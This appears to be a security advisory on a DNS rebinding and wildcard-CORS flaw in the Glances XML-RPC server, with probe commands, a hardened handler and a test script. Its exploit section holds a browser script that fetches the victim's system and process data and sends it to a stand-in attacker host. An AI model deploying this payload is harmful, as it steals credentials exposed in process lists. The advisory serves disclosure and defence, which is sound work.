Glances XML-RPC Server, DNS Rebinding via Host Header Validation Bypass (CVE-2026-33533 / CVE-2026-32632) – High -DC-Jun2026-561


The Glances XML‑RPC server (`glances -s`, implemented in `glances/server.py`) does not validate the HTTP `Host` header, making it vulnerable to DNS rebinding attacks. While CVE‑2026‑32632 (patched in 4.5.2) added `TrustedHostMiddleware` to the REST/WebUI server and the MCP server received equivalent protection in 4.5.1, the XML‑RPC server received neither fix and has no `allowed-hosts` configuration key. The `GlancesXMLRPCHandler` class inherits from Python’s `xmlrpc.server.SimpleXMLRPCRequestHandler` and does not override `parse_request()` to inspect or validate the `Host` header. In contrast, the REST API applies `TrustedHostMiddleware` with an allowlist, and the MCP server uses `TransportSecuritySettings(allowed_hosts=...)`. No `xmlrpc_allowed_hosts` or equivalent setting exists in `glances.conf`, so the server accepts any `Host` value on every incoming request.
An attacker can exploit this by registering a domain (e.g., attacker.example.com) with a low‑TTL DNS record initially pointing to their own server. They serve a malicious page that, after the TTL expires and the record is rebound to the target’s IP (e.g., 127.0.0.1), sends a `fetch()` request to `http://attacker.example.com:61209/RPC2`. The browser now resolves the name to the victim’s own loopback address but still sends `Host: attacker.example.com`, because that is simply the host part of the URL; no header spoofing is needed. Because the XML‑RPC server does not validate the `Host` header, it accepts the request and returns the full system monitoring dataset. The attack is amplified by the companion CORS wildcard issue (CVE‑2026‑33533): the server sends `Access-Control-Allow-Origin: *` on every response, and since the request uses `Content-Type: text/plain` there is no preflight, so the victim’s browser lets the attacker’s page (origin attacker.example.com on port 80, a different origin from port 61209) read the cross‑origin response. Together, these flaws enable silent exfiltration of hostname, OS version, full process list with command‑line arguments (often containing API keys, passwords, and tokens), CPU/memory/disk/network statistics, open file descriptors, listening ports, and container metadata. The attack requires no special `glances.conf` settings and works against default installations bound to loopback, LAN, or public IPs.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: ...... Glances XML‑RPC (glances -s)
Version: ........ ≤ 4.5.5_dev1 (pre‑patch)
Vulnerability :.. DNS Rebinding / Host Validation Bypass
Severity: ....... High (CVSS 5.9–7.5)
date: ........... 2026‑03‑29
<h2 style="color: blue;">Prediction: ..... Patch expected by 2026‑04‑15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>

Step 1 – Start the vulnerable XML‑RPC server
glances -s -p 61209
Step 2 – Confirm arbitrary Host header is accepted (should return 200 OK)
curl -s -D - -X POST "http://127.0.0.1:61209/RPC2" \
-H "Host: attacker.example.com" \
-H "Content-Type: text/plain" \
-d '<?xml version="1.0"?>
<methodCall><methodName>getAllPlugins</methodName></methodCall>'
Step 3 – Compare with patched REST API (returns 400 Bad Request)
glances -w -p 61210 --webui-port 61210
curl -s -o /dev/null -w "%{http_code}\n" \
"http://127.0.0.1:61210/api/4/status" \
-H "Host: attacker.example.com"
Step 4 – Verify absence of Host check in source code
python3 -c "
import sys, inspect
sys.path.insert(0, '/path/to/glances')
import glances.server as s
src = inspect.getsource(s.GlancesXMLRPCHandler)
print('Host check present:', 'allowed_hosts' in src or 'Host' in src)
"
Output: Host check present: False

<h2 style="color: blue;">Exploit:</h2>
1. Attacker registers `attacker.example.com` with a 1‑second TTL, initially pointing to their own IP.
2. Victim visits `http://attacker.example.com`; the page contains:

<script>
async function exfil() {
const payload = `<?xml version="1.0"?>
<methodCall><methodName>getAll</methodName></methodCall>`;
const r = await fetch('http://attacker.example.com:61209/RPC2', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: payload,
});
const data = await r.text();
await fetch('https://collect.attacker.example.com/?d=' + btoa(data));
}
setTimeout(exfil, 5000); // wait for DNS to rebind to 127.0.0.1
</script>

3. After TTL expiry, the DNS resolves to 127.0.0.1; the browser’s `fetch()` is sent to `127.0.0.1:61209` with `Host: attacker.example.com`.
4. The XML‑RPC server accepts the request and returns the full monitoring dataset.
5. The `Access-Control-Allow-Origin: *` header allows the attacker’s page to read the response and exfiltrate it.

Protection:

  • Option 1 (Preferred): Add Host validation to `GlancesXMLRPCHandler` by overriding parse_request():
    class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):
        allowed_hosts: list[str] = []  # populated from config (lower-case entries)

        def parse_request(self) -> bool:
            if not super().parse_request():
                return False
            if self.allowed_hosts:
                host = self.headers.get('Host', '').strip().lower()
                # strip the :port; keep a bracketed IPv6 literal ([::1]:61209) intact
                if host.startswith('[') and ']' in host:
                    host = host[:host.index(']') + 1]
                else:
                    host = host.split(':')[0]
                if host not in self.allowed_hosts:
                    self.send_error(400, 'Bad Request: invalid Host header')
                    return False
            return True


    Populate `allowed_hosts` from the existing `webui_allowed_hosts` config key to provide a single control knob.
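The following is an added example, not Glances project code and not code from this advisory. It puts the check from Steps 2 and 4 and the fix from Option 1 side by side in one runnable script: two stand-in XML‑RPC servers built on the stock `xmlrpc.server.SimpleXMLRPCRequestHandler`, one that (like the handler described above) never inspects `Host` and also emits the wildcard CORS header, and one with the `parse_request()` override. `probe()` sends the same `getAllPlugins` call as the curl in Step 2 with an arbitrary `Host` and reports what the server did; it can be pointed at a real `glances -s` on port 61209 as well. The `host_allowed()` helper, the handler class names and the `getAllPlugins` stub reply are this example's own assumptions.

```python
"""Host-header validation for xmlrpc.server: vulnerable stand-in vs. hardened handler.

Added example; not Glances code. The stand-in servers, host_allowed() and the
handler names are assumptions of this example. The getAllPlugins reply is a
constructed stub, not real Glances output.
"""
import http.client
import threading
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler

# Same call as the Step 2 curl probe.
XMLRPC_CALL = (b'<?xml version="1.0"?>'
               b'<methodCall><methodName>getAllPlugins</methodName></methodCall>')


class QuietHandler(SimpleXMLRPCRequestHandler):
    rpc_paths = ('/', '/RPC2')

    def log_message(self, fmt, *args):   # keep the demo output clean
        pass


class VulnerableHandler(QuietHandler):
    """Stock behaviour: no Host check, plus the wildcard CORS header (CVE-2026-33533)."""

    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        super().end_headers()


def host_allowed(host_header, allowed):
    """True if the Host value (minus any :port) is in the lower-cased allowlist.
    A bracketed IPv6 literal such as [::1]:61209 is kept whole; a plain
    split(':')[0] would reduce it to '['."""
    host = (host_header or '').strip().lower()
    if not host:
        return False                      # a missing or empty Host is never trusted
    if host.startswith('['):
        end = host.find(']')
        if end == -1:
            return False
        host = host[:end + 1]
    else:
        host = host.split(':', 1)[0]
    return host in allowed


class HardenedHandler(QuietHandler):
    """Option 1: reject any request whose Host is not in the allowlist."""
    allowed_hosts = frozenset()           # a real deployment fills this from config

    def parse_request(self):
        if not super().parse_request():
            return False
        if self.allowed_hosts and not host_allowed(self.headers.get('Host'), self.allowed_hosts):
            self.send_error(400, 'Bad Request: invalid Host header')
            return False
        return True


def start_server(handler_cls, allowed_hosts=()):
    """Serve a stub getAllPlugins on an ephemeral loopback port; return (server, port)."""
    cls = type('Handler', (handler_cls,),
               {'allowed_hosts': frozenset(h.lower() for h in allowed_hosts)})
    srv = SimpleXMLRPCServer(('127.0.0.1', 0), requestHandler=cls, logRequests=False)
    srv.register_function(lambda: ['cpu', 'mem'], 'getAllPlugins')  # constructed stub
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe(ip, port, host_header, path='/RPC2'):
    """POST getAllPlugins with an arbitrary Host header and report the outcome."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    conn.putrequest('POST', path, skip_host=True)      # we set Host ourselves
    conn.putheader('Host', host_header)
    conn.putheader('Content-Type', 'text/xml')
    conn.putheader('Content-Length', str(len(XMLRPC_CALL)))
    conn.endheaders(XMLRPC_CALL)
    resp = conn.getresponse()
    body = resp.read()
    acao = resp.getheader('Access-Control-Allow-Origin')
    conn.close()
    return {'status': resp.status,
            'host_accepted': resp.status == 200 and b'<methodResponse>' in body,
            'cors_wildcard': acao == '*'}


def verdict(result):
    """Interpret a probe that was sent with a Host the server should NOT serve."""
    if result['host_accepted'] and result['cors_wildcard']:
        return 'VULNERABLE'            # rebound request answered and readable cross-origin
    if result['host_accepted']:
        return 'HOST-NOT-VALIDATED'    # rebinding reaches the API; only CORS stops the read
    return 'REJECTED'


if __name__ == '__main__':
    for cls in (VulnerableHandler, HardenedHandler):
        srv, port = start_server(cls, ['localhost', '127.0.0.1', '[::1]'])
        foreign = probe('127.0.0.1', port, 'attacker.example.com')
        print(cls.__name__, 'foreign Host ->', foreign['status'], verdict(foreign))
        print(cls.__name__, 'localhost    ->', probe('127.0.0.1', port, 'localhost:%d' % port)['status'])
        srv.shutdown()
```

To check a live instance, call `probe('127.0.0.1', 61209, 'attacker.example.com')` against `glances -s -p 61209`. Two things to keep in mind when applying the allowlist: it must contain every name legitimate clients actually put in `Host` (`localhost`, the host's IP, any DNS name used by `glances -c`), or those clients start getting 400s, and the Host check is the control that matters: removing the wildcard CORS header alone only stops the browser from reading the response, while the rebound request still reaches the API.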

  • Option 2: Deprecate and remove the legacy XML‑RPC server; the REST API (glances -w) offers a superset of functionality with all current security controls.

Impact:

  • Confidentiality: High – complete system monitoring data (hostname, OS, kernel, full process list with command‑line arguments, CPU/memory/disk/network stats, open file descriptors, listening ports, Docker/Kubernetes metadata) can be read remotely without credentials.
  • Integrity: None – the XML‑RPC API is read‑only.
  • Availability: None – no denial‑of‑service component.
  • Who is impacted: Any user whose browser can reach a Glances XML‑RPC server and who can be lured to an attacker‑controlled page. This includes loopback, LAN, and public‑IP deployments.

Sources:

Reported By: github.com